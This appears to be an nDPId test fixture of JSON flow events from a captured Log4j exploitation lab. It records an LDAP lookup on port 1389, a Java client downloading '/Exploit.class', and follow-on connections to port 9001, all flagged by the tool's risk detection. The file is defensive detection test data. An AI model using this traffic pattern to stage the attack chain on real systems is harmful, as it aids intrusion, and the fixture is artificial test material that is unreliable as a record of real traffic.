00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834639,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834639,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzOBEAAQAY4gKwQ7gqsEO4LvZYAUJNLn5gAAAAAoAJyEDRmAAACBAW0BAIICvIpXHQAAAAAAQMDBw=="}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9lr\/2uzmTS5+ZoBJxIDRmAAACBAW0BAIICinhDXHyKVx0AQMDBw=="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADTOBUAAQAY4h6wQ7gqsEO4LvZYAUJNLn5m\/9rs6gBAA5TReAAABAQgK8ilcdSnhDXE="}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}}
01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834645,"flow_last_seen":1639425834645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834645,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639425834645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834645,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNUUAAQAY\/J6wQ7goKCgof2MojKQYXlfcAAAAAoAJyEK5yAAACBAW0BAIICq5YS5wAAAAAAQMDBw=="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1639425834646,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAACgAAEAAQAaMjAoKCh+sEO4KIynYygAAAAAGF5X4UBQAAGmJAAA="}
00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00942{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":354,"flow_first_seen":1639425815944,"flow_last_seen":1639425833586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":861,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":65,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1639425815944,"flow_last_seen":1639425823295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1639425823295,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834628,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834628,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hjinD15132liFoBJxIDRmAAACBAW0BAIICinhDWbyKVxpAQMDBw=="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1639425834628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADRNd0AAQAa5FawQ7gqsEO4L4Y4FbXfaWIUpw9eegBAA5TReAAABAQgK8ilcainhDWY="}
00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834628,"flow_last_seen":1639425834629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425834629,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834639,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834639,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzOBEAAQAY4gKwQ7gqsEO4LvZYAUJNLn5gAAAAAoAJyEDRmAAACBAW0BAIICvIpXHQAAAAAAQMDBw=="}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834639,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9lr\/2uzmTS5+ZoBJxIDRmAAACBAW0BAIICinhDXHyKVx0AQMDBw=="}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1639425834639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADTOBUAAQAY4h6wQ7gqsEO4LvZYAUJNLn5m\/9rs6gBAA5TReAAABAQgK8ilcdSnhDXE="}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}}
01059{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834645,"flow_last_seen":1639425834645,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834645,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639425834645,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834645,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNUUAAQAY\/J6wQ7goKCgof2MojKQYXlfcAAAAAoAJyEK5yAAACBAW0BAIICq5YS5wAAAAAAQMDBw=="}
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639425834646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1639425834646,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAACgAAEAAQAaMjAoKCh+sEO4KIynYygAAAAAGF5X4UBQAAGmJAAA="}
00836{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00942{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":354,"flow_first_seen":1639425815944,"flow_last_seen":1639425833586,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":861,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00942{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
